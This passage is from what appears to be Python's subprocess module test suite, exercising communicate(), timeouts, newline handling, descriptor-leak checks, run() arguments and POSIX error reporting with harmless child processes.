self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build pushes something like "[42442 refs]\n"
# to stderr when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is restricted to Linux-ish platforms for simplicity, to at
# least have some coverage. It is not a platform-specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
class Path:
def __fspath__(self):
# the name of a command that can be run without
# any arguments and that exits fast
return 'dir' if mswindows else 'ls'
path = Path()
if mswindows:
res = subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
else:
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
class Path:
def __fspath__(self):
# the name of a command that can be run without
# any arguments and that exits fast
return sys.executable
path = Path()
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard-coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests, we can forgo
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called, but there is no easy way
# to do that.
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
